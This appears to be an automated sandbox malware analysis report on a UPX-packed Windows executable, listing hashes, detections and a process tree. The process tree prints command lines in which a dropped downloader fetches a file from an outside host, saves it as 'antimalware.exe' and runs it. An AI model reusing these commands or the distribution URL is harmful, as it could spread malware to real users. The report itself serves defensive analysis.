a0bdfd11db71f8a2efe0c7a21865ee8550aad33eca5fba022266910522bdee81

Analysis

max time kernel
119s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
30/12/2023, 01:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09c4bf9b51c56260cbc50c947778819a.exe
Size

139KB
MD5

09c4bf9b51c56260cbc50c947778819a
SHA1

946e4afd5745cbed9be7dae9612e91aac7275626
SHA256

a0bdfd11db71f8a2efe0c7a21865ee8550aad33eca5fba022266910522bdee81
SHA512

55c22d182accbade9a56551879654e85f223cf3f86810f78cabd79093762cbd0e10544d1f51626493f0a65d83c7e51a76d57f673610b2f5b0a28a81690322c3f
SSDEEP

3072:iSB1Ed0h4MEHZB5TiVhf/rw9pCLkmDVe8VFHqjxNQ6r:iSB1Ed0h/CB5OVhc9pCLNVe8+xNQC

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2096	start.exe
3024	dw.exe
2764	dw.exe

Loads dropped DLL 5 IoCs

pid	Process
1420	09c4bf9b51c56260cbc50c947778819a.exe
2916	cmd.exe
2916	cmd.exe
2916	cmd.exe
2916	cmd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000c000000012267-5.dat	upx
behavioral1/memory/1420-7-0x0000000000770000-0x0000000000785000-memory.dmp	upx
behavioral1/memory/2096-10-0x0000000000400000-0x0000000000415000-memory.dmp	upx
behavioral1/memory/2096-174-0x0000000000400000-0x0000000000415000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 1420 wrote to memory of 2096	1420	09c4bf9b51c56260cbc50c947778819a.exe	28
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2096 wrote to memory of 2916	2096	start.exe	29
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 3024	2916	cmd.exe	31
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2764	2916	cmd.exe	32
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33
PID 2916 wrote to memory of 2612	2916	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\09c4bf9b51c56260cbc50c947778819a.exe
"C:\Users\Admin\AppData\Local\Temp\09c4bf9b51c56260cbc50c947778819a.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1420
- C:\Users\Admin\AppData\Local\Temp\start.exe
  "C:\Users\Admin\AppData\Local\Temp\start.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\40C8.tmp\start.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\dw.exe
      C:\Users\Admin\AppData\Local\Temp\dw.exe http://smart.coreenglish.co.kr/smart/avisosl/counter.php Admin.tmp
      4⤵
      Executes dropped EXE
      PID:3024
  - - C:\Users\Admin\AppData\Local\Temp\dw.exe
      C:\Users\Admin\AppData\Local\Temp\dw.exe http://smart.coreenglish.co.kr/smart/492C0ED44E73249708175EF43E.spk ""C:\Users\Admin\AppData\Local\Temp\antimalware.exe""
      4⤵
      Executes dropped EXE
      PID:2764
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\antimalware.exe""
      4⤵
      PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\40C8.tmp\start.bat

Filesize
10KB

MD5
cc533a0bdac67621165244d931450506

SHA1
f23736d7a1a1daa6048584e531cfa3b0df99c185

SHA256
5ea934634ee3541cf6c16a68913051507718a894bda9eab6b6b5e97b9959b0c0

SHA512
77b366e97ff58817fc4dfd8609bf557c94eb312f18986ff78ee7446947b0bf618155e82cde23553d685815914afb12d0a1768352f2b60c582a6ba6778f523658

Download Submit
C:\Users\Admin\AppData\Local\Temp\dw.exe

Filesize
60KB

MD5
6d2c398e03397c9d089edc0f00ab3fcb

SHA1
57d92e2f61dc613774db1ef8e5088ca57f34c6c6

SHA256
c99b74a890425df90f96a049942fa5efbf88b7103155342412d83e14c7acbce8

SHA512
5afd56cd03d9122f1713e7d7478dabb0f0e6d63dabca257463c878a4ce321740cc7ffe6be78abce847e6bf5f8a0d2228b8b1d4b1bfbed539a8e3ce18c7736c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\ponttopoint.dat

Filesize
115B

MD5
1c643a7719485ef5cf72095775ce43ed

SHA1
5b2da2d69be541b8b4eda36dacdc66425417b103

SHA256
a75f9790e96f1269f36816b4ee2da35d1dd4d54e4c3d3a04acc3ea7f1fa7cf62

SHA512
dca3b5930995ad06b433920b74530413d2bd6a65b9d66ab15e43bdbd2b251acc93fba8ee99edd2897eedaea51c5a060e9eb1827809afeb44874b316cd5092b96

Download Submit
C:\Users\Admin\AppData\Local\Temp\ponttopoint.dat

Filesize
169B

MD5
4302a0a939e17ea73230aa419731f2b0

SHA1
9b50b0b8a571cb44a85e21f23d6c87ddd6c9f2af

SHA256
ab2e5fa38883665688bda87775403269dce45e43ef73d8673e3495bfce8e2357

SHA512
1845c7e18b9a2554c06375dcd030569c9464359715bc871d2749623feb93f0dba68878c3244763ed7fc325490d7f86c06fdd5125959f2bd24acd9db82fe3ac19

Download Submit
C:\Users\Admin\AppData\Local\Temp\ponttopoint.dat

Filesize
235B

MD5
6b4590741afcda369a74badb8720c02c

SHA1
de86a39f5718288fa4979f6f18e72c2bf39dfb50

SHA256
d3f71e8a981597877ab17b230eecef1f6d9b6a305869d22385e04538ba350aef

SHA512
a2b923c774bf73069b1c15b27cbf8b4ef3c771ded7dca0807e228304fa87ba45b07946c811e57182fda4b14d1e0d5335f187f0624b8714a7f35e88779af8811f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ponttopoint.dat

Filesize
310B

MD5
901b98180d39d0aed18edac0b7128d74

SHA1
1aca6d2244eb5849503bd8aaede26e5c0186c9be

SHA256
c8338d8054d7c8c6c1285bd9333c807d249d8ab050995099a93d297385c8e3cf

SHA512
846144c3a3f0b70c3f9f94af2988ef7b205bc84ee18d03c3561176994097aeaa0fa542be5b8da4457b7ccf7065cda0469d5038043f4857825702db2bf2aaba8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ponttopoint.dat

Filesize
364B

MD5
8929305ba617243d3eb8973c8e6b204d

SHA1
e5e16947798f1985885e19116d3d2bed1f156067

SHA256
16a4a72971e8f258fae3885ad0f2d2573a3adb0727e459d8768f1aee159d56bf

SHA512
11abf486ddfecd6ad9a286ad9bcd04eee4f6110087d859a358dd0e38a6556a87a814c17f9c17f9f11343163aa1526dbbb76229584145ed3fe4b3e3363688e39a

Download Submit
\Users\Admin\AppData\Local\Temp\start.exe

Filesize
23KB

MD5
4b827450456826b9b9fd6b562d5f01a3

SHA1
624b51a18806b08545a2e9b9c83a83edeae063bb

SHA256
4244245f5ca580f8a9d526d3e2a494d2bc3e077d8c2f3ae4e9b2035d262737ad

SHA512
19931d7d3519363f53c188da4167f7f66c5dc6dfcbd483c3b61d55f9208ce42d0b40fea48b8184de2d72e88a78b654e036630547d901c627fbddffbb994e1f6a

Download Submit
memory/1420-7-0x0000000000770000-0x0000000000785000-memory.dmp

Filesize
84KB

Download
memory/2096-10-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/2096-174-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download